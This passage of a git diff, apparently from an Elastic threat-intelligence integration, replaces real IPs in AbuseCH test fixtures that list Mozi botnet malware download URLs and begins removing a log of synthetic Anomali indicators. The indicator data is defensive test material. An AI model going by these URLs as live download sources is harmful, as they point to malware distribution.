"89.160.20.156", + "full": "http://89.160.20.156:56491/Mozi.m" }, - "ip": "58.249.22.13" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695038678Z", - "original": "{\"id\":\"960883\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960883/\",\"url\":\"http://58.249.22.13:56491/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.249.22.13\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029507100Z", + "original": "{\"id\":\"960883\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960883/\",\"url\":\"http://89.160.20.156:56491/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -32511,18 +32511,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://120.193.91.214:46067/Mozi.a", + "original": "http://89.160.20.156:46067/Mozi.a", "scheme": "http", "port": 46067, - "domain": "120.193.91.214", - "full": "http://120.193.91.214:46067/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46067/Mozi.a" }, - "ip": "120.193.91.214" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695043246Z", - "original": "{\"id\":\"960879\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960879/\",\"url\":\"http://120.193.91.214:46067/Mozi.a\",\"url_status\":\"online\",\"host\":\"120.193.91.214\",\"date_added\":\"2021-01-14 15:20:19 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029513800Z", + "original": "{\"id\":\"960879\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960879/\",\"url\":\"http://89.160.20.156:46067/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:20:19 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" diff --git a/packages/ti_abusech/manifest.yml b/packages/ti_abusech/manifest.yml index ca1b4faac6a..93d532f07db 100644 --- a/packages/ti_abusech/manifest.yml +++ b/packages/ti_abusech/manifest.yml @@ -1,6 +1,6 @@ name: ti_abusech title: AbuseCH -version: 1.1.2 +version: 1.1.3 release: ga description: Collect threat intelligence from AbuseCH API with Elastic Agent. type: integration diff --git a/packages/ti_anomali/_dev/deploy/docker/sample_logs/test-threatstream-ndjson.log b/packages/ti_anomali/_dev/deploy/docker/sample_logs/test-threatstream-ndjson.log index f47d73388fd..1e657cf1b3b 100644 --- a/packages/ti_anomali/_dev/deploy/docker/sample_logs/test-threatstream-ndjson.log +++ b/packages/ti_anomali/_dev/deploy/docker/sample_logs/test-threatstream-ndjson.log @@ -1,100 +1,100 @@ -{"domain": "0jp2k.example.org", "itype": "mal_domain", "classification": "public", "lat": -69, "update_id": 3414980235, "source_feed_id": 1593, "date_first": "2020-10-08T12:21:50", "confidence": 70, "severity": "medium", "trusted_circle_ids": "737,664,312", "lon": -141, "id": 2283311083, "source": "Phony generated indicator", "state": "active", "import_session_id": 647, "value_type": "domain", "srcip": "192.0.2.168", "org": "OVH Hosting", "date_last": "2020-10-08T12:24:42", "country": "FR", "detail2": "imported by user 477", "resource_uri": "/api/v1/intelligence/P19190095730/"} -{"confidence": 39, "itype": "mal_ip", "severity": "low", "classification": "private", "date_first": "2020-10-08T12:21:59", "country": "RU", "org": "IP Khnykin Vitaliy Yakovlevich", "import_session_id": 1064, "lon": -34, "lat": 37, "source": "Phony generated indicator", "state": "active", "update_id": 3330917000, "trusted_circle_ids": "568,553", "srcip": "192.0.2.182", "detail2": "imported by user 609", "value_type": "ip", "source_feed_id": 2076, "id": 2232122947, "date_last": "2020-10-08T12:24:42", "resource_uri": "/api/v1/intelligence/P19007476881/"} -{"itype": "mal_ip", "classification": "public", "lat": -35, "update_id": 1358793759, "source_feed_id": 1613, "id": 3093117579, "confidence": 27, "severity": "very-high", "trusted_circle_ids": "951,98,921", "lon": -77, "date_first": "2020-10-08T12:22:11", "source": "Phony generated indicator", "state": "active", "import_session_id": 3498, "value_type": "ip", "srcip": "203.0.113.193", "org": "Cox Communications", "asn": "22773", "date_last": "2020-10-08T12:24:42", "country": "US", "detail2": "imported by user 157", "resource_uri": "/api/v1/intelligence/P33405947429/"} -{"confidence": 35, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "407", "date_first": "2020-10-08T12:22:16", "source": "Phony generated indicator", "state": "active", "detail2": "imported by user 156", "import_session_id": 3166, "update_id": 2184632737, "value_type": "md5", "md5": "c0667e3cbdb8e7ed09e36cf16bbf367d270b7893dbd57a838add3f1f7d6e34f4", "source_feed_id": 1624, "id": 3304738500, "date_last": "2020-10-08T12:24:42", "resource_uri": "/api/v1/intelligence/P24670712639/"} -{"itype": "mal_ip", "classification": "private", "lat": -29, "update_id": 3124377221, "source_feed_id": 2999, "id": 1079453726, "confidence": 87, "severity": "high", "trusted_circle_ids": "715", "lon": -180, "date_first": "2020-10-08T12:28:50", "source": "Phony generated indicator", "state": "active", "import_session_id": 2660, "value_type": "ip", "srcip": "192.0.2.48", "org": "Spectrum", "asn": "20001", "date_last": "2020-10-09T18:49:37", "country": "US", "detail2": "imported by user 932", "resource_uri": "/api/v1/intelligence/P42599405560/"} -{"itype": "mal_ip", "classification": "public", "lat": 77, "update_id": 1166855074, "source_feed_id": 3644, "id": 3715444132, "confidence": 46, "severity": "medium", "trusted_circle_ids": "595", "lon": -75, "date_first": "2020-10-08T12:29:01", "source": "Phony generated indicator", "state": "active", "import_session_id": 2220, "value_type": "ip", "srcip": "203.0.113.37", "org": "Spectrum", "asn": "11351", "date_last": "2020-10-09T18:49:37", "country": "US", "detail2": "imported by user 603", "resource_uri": "/api/v1/intelligence/P48778003365/"} -{"confidence": 73, "itype": "c2_domain", "severity": "high", "classification": "private", "trusted_circle_ids": "503,657", "detail": "odq9fo2w,Botnet-YDSH5,popularity=low,type=2,first_seen=2020-12-07T06:41:19,Botnet-UD0,mask=2001:db8:eea9:58a6:63a5:aec3:ec8b:c480,popularity=high,threat=1bj91", "date_first": "2020-10-09T18:14:43", "source": "Phony generated indicator", "state": "active", "update_id": 1962510236, "date_last": "2020-10-09T18:14:43", "domain": "hrzhc.example.com", "lat": -15, "srcip": "192.0.2.6", "detail2": "imported by user 318", "value_type": "domain", "source_feed_id": 1035, "id": 2507010269, "maltype": "malware:bv-", "resource_uri": "/api/v1/intelligence/P26654004337/"} -{"confidence": 46, "itype": "mal_md5", "severity": "very-high", "classification": "private", "trusted_circle_ids": "443,955", "date_first": "2020-10-09T18:30:10", "source": "Phony generated indicator", "state": "active", "detail2": "imported by user 656", "update_id": 3128959438, "value_type": "md5", "md5": "878ecb9401114def7e4a4553f6034e7d", "source_feed_id": 2998, "id": 2460000924, "date_last": "2020-10-09T18:30:10", "resource_uri": "/api/v1/intelligence/P42412607008/"} -{"confidence": -1, "itype": "phish_url", "severity": "very-high", "classification": "public", "url": "https://llvx.example.com/6qk5f1r1v/chxi-ou?ybocaf=z5qokq", "country": "US", "date_first": "2020-10-09T18:30:13", "detail": "51i4d8-", "lat": -66, "source": "Phony generated indicator", "state": "active", "update_id": 1287220013, "date_last": "2020-10-09T18:30:13", "trusted_circle_ids": "122", "srcip": "192.0.2.214", "detail2": "imported by user 27", "value_type": "url", "source_feed_id": 2028, "id": 2202975175, "maltype": "malware:n4s4m", "resource_uri": "/api/v1/intelligence/P15177532091/"} -{"confidence": 63, "itype": "mal_url", "severity": "medium", "classification": "public", "url": "http://uyawvs.example.org/9ch5/kily?vtyrbjij=emv", "country": "CN", "date_first": "2020-10-09T18:30:13", "detail": "gkaqme4yo,6sjcfxwzg", "lat": -15, "source": "Phony generated indicator", "state": "active", "update_id": 1386659937, "date_last": "2020-10-09T18:30:13", "trusted_circle_ids": "934,178,808", "srcip": "203.0.113.122", "detail2": "imported by user 61", "value_type": "url", "source_feed_id": 549, "id": 2092019688, "maltype": "malware:y3x", "resource_uri": "/api/v1/intelligence/P36292553556/"} -{"confidence": 57, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "113,378", "detail": "retstif,3m7uezf", "date_first": "2020-10-09T18:30:22", "source": "Phony generated indicator", "state": "active", "update_id": 3721503559, "maltype": "malware:3fw", "detail2": "imported by user 286", "value_type": "md5", "md5": "2ad6c703f51b8408fc5ff87b9ddac470", "source_feed_id": 301, "id": 2377145189, "date_last": "2020-10-09T18:30:22", "resource_uri": "/api/v1/intelligence/P47523245321/"} -{"confidence": 40, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "19,233,668", "detail": "", "date_first": "2020-10-09T18:30:23", "source": "Phony generated indicator", "state": "active", "update_id": 1162903246, "maltype": "malware:rbdrt", "detail2": "imported by user 580", "value_type": "md5", "md5": "0c1204a3db8599450c5baca9ea98bead", "source_feed_id": 3635, "id": 1669824905, "date_last": "2020-10-09T18:30:23", "resource_uri": "/api/v1/intelligence/P35828682758/"} -{"confidence": 29, "itype": "phish_url", "severity": "high", "classification": "private", "url": "https://gvco87k.example.net/e2hh0j/hknjg?jfkx=ano5a", "country": "US", "date_first": "2020-10-09T18:30:30", "detail": "c46o", "lat": 14, "source": "Phony generated indicator", "state": "active", "update_id": 3127488037, "date_last": "2020-10-09T18:30:30", "trusted_circle_ids": "794,332", "srcip": "192.0.2.182", "detail2": "imported by user 499", "value_type": "url", "source_feed_id": 112, "id": 2916923635, "maltype": "malware:eaua", "resource_uri": "/api/v1/intelligence/P19079964519/"} -{"confidence": 26, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "91,324,683", "detail": "ho5vs8,1a4z", "date_first": "2020-10-09T18:30:37", "source": "Phony generated indicator", "state": "active", "update_id": 3660166879, "maltype": "malware:83hg3krw", "detail2": "imported by user 379", "value_type": "md5", "md5": "74e29781393cf94f625c4953958e151c", "source_feed_id": 2452, "id": 3376957652, "date_last": "2020-10-09T18:30:37", "resource_uri": "/api/v1/intelligence/P46962365435/"} -{"confidence": 71, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "972", "detail": "", "date_first": "2020-10-09T18:30:40", "source": "Phony generated indicator", "state": "active", "update_id": 1883789467, "maltype": "malware:0jsn6", "detail2": "imported by user 217", "value_type": "md5", "md5": "b0221fa428aa350fd8068a8b358bb8d1", "source_feed_id": 2420, "id": 1102036683, "date_last": "2020-10-09T18:30:40", "resource_uri": "/api/v1/intelligence/P29674828621/"} -{"confidence": -1, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "341", "detail": "8vyvx,f8fa", "date_first": "2020-10-09T18:30:45", "source": "Phony generated indicator", "state": "active", "update_id": 1469620546, "maltype": "malware:npswwqxur", "detail2": "imported by user 585", "value_type": "md5", "md5": "b54fda907ce762f5c15eea9f5611f20bf2c5a58c8b0ce470fb0220f8a6beb8ed", "source_feed_id": 337, "id": 1755641012, "date_last": "2020-10-09T18:30:45", "resource_uri": "/api/v1/intelligence/P22150106584/"} -{"confidence": 97, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "982", "detail": "lpptj,q1k9t8", "date_first": "2020-10-09T18:30:54", "source": "Phony generated indicator", "state": "active", "update_id": 2286846275, "maltype": "malware:crsln4", "detail2": "imported by user 654", "value_type": "md5", "md5": "c9505088c2dd7d5874fbd546acfcbdbf", "source_feed_id": 2548, "id": 2264305075, "date_last": "2020-10-09T18:30:54", "resource_uri": "/api/v1/intelligence/P16920958546/"} -{"confidence": 18, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "282,501,196", "detail": "", "date_first": "2020-10-09T18:30:59", "source": "Phony generated indicator", "state": "active", "update_id": 2624566147, "maltype": "malware:ic0k2", "detail2": "imported by user 983", "value_type": "md5", "md5": "518adcf2e4bdaec8efd9073ce2f6c3df", "source_feed_id": 1474, "id": 3820774050, "date_last": "2020-10-09T18:30:59", "resource_uri": "/api/v1/intelligence/P18289584540/"} -{"confidence": -1, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "655,373", "detail": "", "date_first": "2020-10-09T18:31:10", "source": "Phony generated indicator", "state": "active", "update_id": 2162391647, "maltype": "malware:z52sak97f", "detail2": "imported by user 507", "value_type": "md5", "md5": "24850e70142031153cc664941fac99c0", "source_feed_id": 2109, "id": 2172184194, "date_last": "2020-10-09T18:31:10", "resource_uri": "/api/v1/intelligence/P31588497153/"} -{"confidence": 76, "itype": "mal_md5", "severity": "very-high", "classification": "private", "trusted_circle_ids": "73,499,113", "detail": "", "date_first": "2020-10-09T18:31:16", "source": "Phony generated indicator", "state": "active", "update_id": 3288929432, "maltype": "malware:2ipuo01kx", "detail2": "imported by user 984", "value_type": "md5", "md5": "b0843e4bd909b4b20f5e81e431a08015", "source_feed_id": 3889, "id": 2495580437, "date_last": "2020-10-09T18:31:16", "resource_uri": "/api/v1/intelligence/P33175520615/"} -{"confidence": 35, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "189,472,793", "detail": "", "date_first": "2020-10-09T18:31:22", "source": "Phony generated indicator", "state": "active", "update_id": 1526125097, "maltype": "malware:pbxd8", "detail2": "imported by user 792", "value_type": "md5", "md5": "2d0f307b5a552f7cf178e8181010e2d6", "source_feed_id": 2922, "id": 3454531387, "date_last": "2020-10-09T18:31:22", "resource_uri": "/api/v1/intelligence/P26109533305/"} -{"confidence": 27, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "236,515", "detail": "qm8gtmj,kvprr,nyq1os5,mask=2001:db8:562a:384c:c1c3:b4fe:da0b:72cc,threat=ns07", "date_first": "2020-10-09T18:31:27", "source": "Phony generated indicator", "state": "active", "update_id": 1420302328, "maltype": "malware:c-xb3z6", "detail2": "imported by user 892", "value_type": "md5", "md5": "b09fa69176349ad1e90ed86e0974f7a3", "source_feed_id": 3580, "id": 3593911368, "date_last": "2020-10-09T18:31:27", "resource_uri": "/api/v1/intelligence/P49819022001/"} -{"confidence": 66, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "793", "detail": "", "date_first": "2020-10-09T18:31:29", "source": "Phony generated indicator", "state": "active", "update_id": 3330750821, "maltype": "malware:77if", "detail2": "imported by user 995", "value_type": "md5", "md5": "29cbc0f83dd2a10e2803ef962bc22a9d", "source_feed_id": 2593, "id": 1790978719, "date_last": "2020-10-09T18:31:29", "resource_uri": "/api/v1/intelligence/P13903806053/"} -{"confidence": -1, "itype": "phish_url", "severity": "medium", "classification": "public", "url": "https://6x78ivr.example.net/ibqk/z-kgi3?z9450cw=yu11h86-6", "country": "US", "date_first": "2020-10-09T18:31:34", "detail": "9onb7n0", "lat": 36, "source": "Phony generated indicator", "state": "active", "update_id": 1930858440, "date_last": "2020-10-09T18:31:34", "trusted_circle_ids": "472", "srcip": "203.0.113.219", "detail2": "imported by user 762", "value_type": "url", "source_feed_id": 1594, "id": 2703977730, "maltype": "malware:0l3", "resource_uri": "/api/v1/intelligence/P40573280971/"} -{"confidence": -1, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "779,394", "detail": "nxym,vvb-ttegv", "date_first": "2020-10-09T18:31:36", "source": "Phony generated indicator", "state": "active", "update_id": 3007961665, "maltype": "malware:im9rh6a2", "detail2": "imported by user 739", "value_type": "md5", "md5": "c030aac4be48a8bc1300fce144a39ca6151544bee4ca47d54a559acd8ca9a7f2", "source_feed_id": 3037, "id": 3180105466, "date_last": "2020-10-09T18:31:36", "resource_uri": "/api/v1/intelligence/P46592136975/"} -{"confidence": 51, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "148,701", "detail": "", "date_first": "2020-10-09T18:31:39", "source": "Phony generated indicator", "state": "active", "update_id": 3987533970, "maltype": "malware:xr2vy", "detail2": "imported by user 684", "value_type": "md5", "md5": "b1cb5ed5d82e42a1e4afcd6d53cf99ea", "source_feed_id": 3268, "id": 2718137308, "date_last": "2020-10-09T18:31:39", "resource_uri": "/api/v1/intelligence/P20125331715/"} -{"confidence": 69, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "42", "detail": "qns,s8eho", "date_first": "2020-10-09T18:31:43", "source": "Phony generated indicator", "state": "active", "update_id": 2686121759, "maltype": "malware:qt199", "detail2": "imported by user 669", "value_type": "md5", "md5": "4e319ec817873f80393a5dd024f71ca7", "source_feed_id": 2063, "id": 1415663416, "date_last": "2020-10-09T18:31:43", "resource_uri": "/api/v1/intelligence/P13616238585/"} -{"confidence": -1, "itype": "scan_ip", "severity": "low", "classification": "private", "country": "DE", "date_first": "2020-10-09T18:31:49", "detail": "", "lat": 46, "source": "Phony generated indicator", "state": "active", "update_id": 1368674489, "date_last": "2020-10-09T18:31:49", "trusted_circle_ids": "187", "srcip": "203.0.113.62", "detail2": "imported by user 989", "value_type": "ip", "source_feed_id": 2338, "id": 3617882514, "maltype": "malware:axi", "resource_uri": "/api/v1/intelligence/P34950154880/"} -{"confidence": 7, "itype": "phish_url", "severity": "very-high", "classification": "private", "url": "http://vgge6wq.example.net/p3ij2qg5/32unmbyea?kx0=o-x", "country": "US", "date_first": "2020-10-09T18:31:49", "detail": "eo1axyco", "lat": 23, "source": "Phony generated indicator", "state": "active", "update_id": 1737632407, "date_last": "2020-10-09T18:31:49", "trusted_circle_ids": "1,987,503", "srcip": "203.0.113.16", "detail2": "imported by user 144", "value_type": "url", "source_feed_id": 1907, "id": 2183445671, "maltype": "malware:ens", "resource_uri": "/api/v1/intelligence/P32340211585/"} -{"confidence": -1, "itype": "phish_url", "severity": "high", "classification": "private", "url": "https://g-5wb4c.example.net/uo4v/-m33cfxe?cl7aculw9=x0vtjg6n4", "country": "US", "date_first": "2020-10-09T18:31:58", "detail": "uc3ji", "lat": -27, "source": "Phony generated indicator", "state": "active", "update_id": 1303579438, "date_last": "2020-10-09T18:31:58", "trusted_circle_ids": "499", "srcip": "203.0.113.160", "detail2": "imported by user 558", "value_type": "url", "source_feed_id": 3750, "id": 2736376437, "maltype": "malware:b2hm", "resource_uri": "/api/v1/intelligence/P17661934088/"} -{"confidence": 61, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "938", "detail": "", "date_first": "2020-10-09T18:32:02", "source": "Phony generated indicator", "state": "active", "update_id": 2352882311, "maltype": "malware:ggvm4q", "detail2": "imported by user 193", "value_type": "md5", "md5": "4ba68dadfb7cb40e78ccd27fd66f732c", "source_feed_id": 1297, "id": 2684269934, "date_last": "2020-10-09T18:32:02", "resource_uri": "/api/v1/intelligence/P17181153596/"} -{"confidence": -1, "itype": "mal_md5", "severity": "very-high", "classification": "private", "trusted_circle_ids": "324,530,73", "detail": "fter66,wsb3tlc7", "date_first": "2020-10-09T18:32:03", "source": "Phony generated indicator", "state": "active", "update_id": 1252111059, "maltype": "malware:isy7km0sh", "detail2": "imported by user 363", "value_type": "md5", "md5": "7b31a1a59bae209e55f53b363b9222f93f03a83c9e112852f199521a9bcf4fc5", "source_feed_id": 819, "id": 2020869646, "date_last": "2020-10-09T18:32:03", "resource_uri": "/api/v1/intelligence/P30344381094/"} -{"confidence": 36, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "501", "detail": "", "date_first": "2020-10-09T18:32:04", "source": "Phony generated indicator", "state": "active", "update_id": 3372666916, "maltype": "malware:ae8u", "detail2": "imported by user 351", "value_type": "md5", "md5": "0050e5d31f9bf0ecf3b81f7799b92525", "source_feed_id": 2699, "id": 2290504913, "date_last": "2020-10-09T18:32:04", "resource_uri": "/api/v1/intelligence/P25291610896/"} -{"confidence": 82, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "924,134,532", "detail": "", "date_first": "2020-10-09T18:32:08", "source": "Phony generated indicator", "state": "active", "update_id": 3906793036, "maltype": "malware:z88yzsto", "detail2": "imported by user 805", "value_type": "md5", "md5": "f2a382c1573fba4245761f4ae80d17f6", "source_feed_id": 566, "id": 2703081376, "date_last": "2020-10-09T18:32:08", "resource_uri": "/api/v1/intelligence/P30547747040/"} -{"confidence": 64, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "967,983,715", "detail": "", "date_first": "2020-10-09T18:32:11", "source": "Phony generated indicator", "state": "active", "update_id": 1686957810, "maltype": "malware:y2xzvvpfu", "detail2": "imported by user 699", "value_type": "md5", "md5": "cfa25fe3deff6c9e3c5ef77664275fe34c01f2bed4e849e4f23894780974d496", "source_feed_id": 157, "id": 3547132893, "date_last": "2020-10-09T18:32:11", "resource_uri": "/api/v1/intelligence/P41360346077/"} -{"confidence": 43, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "619,401", "detail": "", "date_first": "2020-10-09T18:32:19", "source": "Phony generated indicator", "state": "active", "update_id": 2895957620, "maltype": "malware:0re8iaji", "detail2": "imported by user 349", "value_type": "md5", "md5": "7d379c8c8462a4a8a7f49f423274d030", "source_feed_id": 2293, "id": 3805778271, "date_last": "2020-10-09T18:32:19", "resource_uri": "/api/v1/intelligence/P19192265363/"} -{"confidence": 13, "itype": "scan_ip", "severity": "medium", "classification": "private", "country": "CN", "date_first": "2020-10-09T18:32:30", "detail": "", "lat": -38, "source": "Phony generated indicator", "state": "active", "update_id": 1226861060, "date_last": "2020-10-09T18:32:30", "trusted_circle_ids": "238,301", "srcip": "203.0.113.33", "detail2": "imported by user 363", "value_type": "ip", "source_feed_id": 1310, "id": 1401034980, "maltype": "malware:wnar", "resource_uri": "/api/v1/intelligence/P31097047895/"} -{"confidence": 90, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "105", "detail": "", "date_first": "2020-10-09T18:32:35", "source": "Phony generated indicator", "state": "active", "update_id": 3193095576, "maltype": "malware:9x0-q2", "detail2": "imported by user 41", "value_type": "md5", "md5": "8501f8ba604247e7b843f44d0fa39283", "source_feed_id": 3358, "id": 2929715396, "date_last": "2020-10-09T18:32:35", "resource_uri": "/api/v1/intelligence/P16926565414/"} -{"confidence": 80, "itype": "phish_url", "severity": "medium", "classification": "public", "url": "https://fodvsh.example.org/hqbr/dj32sw6-?d-1vo=zk458v0c", "country": "US", "date_first": "2020-10-09T18:33:10", "detail": "fp-3s3-", "lat": -27, "source": "Phony generated indicator", "state": "active", "update_id": 1909602212, "date_last": "2020-10-09T18:33:10", "trusted_circle_ids": "633", "srcip": "203.0.113.224", "detail2": "imported by user 442", "value_type": "url", "source_feed_id": 1262, "id": 3203248155, "maltype": "malware:c2lvfcl", "resource_uri": "/api/v1/intelligence/P34598289945/"} -{"confidence": 93, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "247,633", "detail": "", "date_first": "2020-10-09T18:33:13", "source": "Phony generated indicator", "state": "active", "update_id": 3152387474, "maltype": "malware:2v2dqt6k", "detail2": "imported by user 589", "value_type": "md5", "md5": "1091936e285244f3666848a8abf8280fd10a15d23ff9d196ed9e95256c6b91b9", "source_feed_id": 257, "id": 1344271853, "date_last": "2020-10-09T18:33:13", "resource_uri": "/api/v1/intelligence/P20106213042/"} -{"confidence": 22, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "869", "detail": "", "date_first": "2020-10-09T18:33:14", "source": "Phony generated indicator", "state": "active", "update_id": 1362676688, "maltype": "malware:10w", "detail2": "imported by user 225", "value_type": "md5", "md5": "a4eed62e00de9ffe130d286c7b5d09130ccdf423", "source_feed_id": 2060, "id": 1409521915, "date_last": "2020-10-09T18:33:14", "resource_uri": "/api/v1/intelligence/P42448549960/"} -{"confidence": 0, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "505", "detail": "", "date_first": "2020-10-09T18:33:14", "source": "Phony generated indicator", "state": "active", "update_id": 2357099704, "maltype": "malware:g0z", "detail2": "imported by user 714", "value_type": "md5", "md5": "fe1ed2a7475cec963c2bb419f2a7c689", "source_feed_id": 2527, "id": 1536611967, "date_last": "2020-10-09T18:33:14", "resource_uri": "/api/v1/intelligence/P13255407178/"} -{"confidence": 8, "itype": "phish_url", "severity": "medium", "classification": "public", "url": "http://qfe6d.example.net/nk1a0m71c/qp0?t6yd498=3-8th2", "country": "US", "date_first": "2020-10-09T18:33:22", "detail": "2bqsik", "lat": -24, "source": "Phony generated indicator", "state": "active", "update_id": 2574696234, "date_last": "2020-10-09T18:33:22", "trusted_circle_ids": "815,80", "srcip": "203.0.113.147", "detail2": "imported by user 711", "value_type": "url", "source_feed_id": 340, "id": 3554768995, "maltype": "malware:xb2awlx", "resource_uri": "/api/v1/intelligence/P34181538928/"} -{"confidence": 12, "itype": "mal_md5", "severity": "high", "classification": "public", "trusted_circle_ids": "717", "detail": "fuge7j6,yhmk", "date_first": "2020-10-09T18:33:24", "source": "Phony generated indicator", "state": "active", "update_id": 1606866217, "maltype": "malware:k9fxm7g27", "detail2": "imported by user 657", "value_type": "md5", "md5": "1d1a366dfae08f4f20e7265ce03c194c", "source_feed_id": 3452, "id": 2657255157, "date_last": "2020-10-09T18:33:24", "resource_uri": "/api/v1/intelligence/P30838854666/"} -{"confidence": 40, "itype": "phish_url", "severity": "low", "classification": "public", "url": "http://bn2w.example.org/buurw/6xdra3p7p?7u2frmxc=z82j1gt", "country": "US", "date_first": "2020-10-09T18:33:26", "detail": "o7z-", "lat": -26, "source": "Phony generated indicator", "state": "active", "update_id": 1217624857, "date_last": "2020-10-09T18:33:26", "trusted_circle_ids": "778", "srcip": "203.0.113.102", "detail2": "imported by user 395", "value_type": "url", "source_feed_id": 2196, "id": 2981028957, "maltype": "malware:15a5ax", "resource_uri": "/api/v1/intelligence/P31969585221/"} -{"confidence": 89, "itype": "phish_url", "severity": "very-high", "classification": "private", "url": "http://jzaz.example.com/h6v8mxqh/ntr?dif3b=53dmuir", "country": "US", "date_first": "2020-10-09T18:33:27", "detail": "teyku", "lat": -46, "source": "Phony generated indicator", "state": "active", "update_id": 2065962650, "date_last": "2020-10-09T18:33:27", "trusted_circle_ids": "430,191", "srcip": "203.0.113.246", "detail2": "imported by user 108", "value_type": "url", "source_feed_id": 705, "id": 3698734512, "maltype": "malware:mhlpzbtu", "resource_uri": "/api/v1/intelligence/P12593861505/"} -{"confidence": 11, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "517,469,743", "detail": "-0jlm,tmxqwg", "date_first": "2020-10-09T18:33:29", "source": "Phony generated indicator", "state": "active", "update_id": 1904470545, "maltype": "malware:81eom", "detail2": "imported by user 17", "value_type": "md5", "md5": "5887cb3906519b42df2e8b6755e83588", "source_feed_id": 3247, "id": 2666238854, "date_last": "2020-10-09T18:33:29", "resource_uri": "/api/v1/intelligence/P21844887028/"} -{"confidence": 63, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "411,474,991", "detail": "", "date_first": "2020-10-09T18:33:43", "source": "Phony generated indicator", "state": "active", "update_id": 3051330569, "maltype": "malware:dho5kpeg", "detail2": "imported by user 860", "value_type": "md5", "md5": "2f1a7f0591e2dbc94dcc994b612c44a2c4eda007", "source_feed_id": 3139, "id": 1926950021, "date_last": "2020-10-09T18:33:43", "resource_uri": "/api/v1/intelligence/P25323157194/"} -{"confidence": -1, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "660,616", "detail": "as3fg1e,f-8n3", "date_first": "2020-10-09T18:33:45", "source": "Phony generated indicator", "state": "active", "update_id": 3670259337, "maltype": "malware:ysi", "detail2": "imported by user 368", "value_type": "md5", "md5": "0fe1b140ae86038a7c06002d9897c9f84695d0d64dfaec1344f2f2157855b5d9", "source_feed_id": 400, "id": 3051200032, "date_last": "2020-10-09T18:33:45", "resource_uri": "/api/v1/intelligence/P23391147747/"} -{"confidence": 47, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "183,729,874", "detail": "", "date_first": "2020-10-09T18:33:45", "source": "Phony generated indicator", "state": "active", "update_id": 1443383610, "maltype": "malware:tr4fyclye", "detail2": "imported by user 792", "value_type": "md5", "md5": "e3d11c062f057cd832380a6083b1a39c", "source_feed_id": 3002, "id": 1354407474, "date_last": "2020-10-09T18:33:45", "resource_uri": "/api/v1/intelligence/P22953994442/"} -{"confidence": 98, "itype": "phish_url", "severity": "low", "classification": "public", "url": "http://9z2mc0i0.example.org/lzgwxax8/a7amlcak5?wpm=-3trptis8", "country": "US", "date_first": "2020-10-09T18:33:48", "detail": "mn0-hjh", "lat": 25, "source": "Phony generated indicator", "state": "active", "update_id": 3284440485, "date_last": "2020-10-09T18:33:48", "trusted_circle_ids": "691,420,893", "srcip": "2001:db8:67ba:fcb2:d55:a7fa:2598:ae42", "detail2": "imported by user 311", "value_type": "url", "source_feed_id": 149, "id": 1667086710, "maltype": "malware:-xz6gfl", "resource_uri": 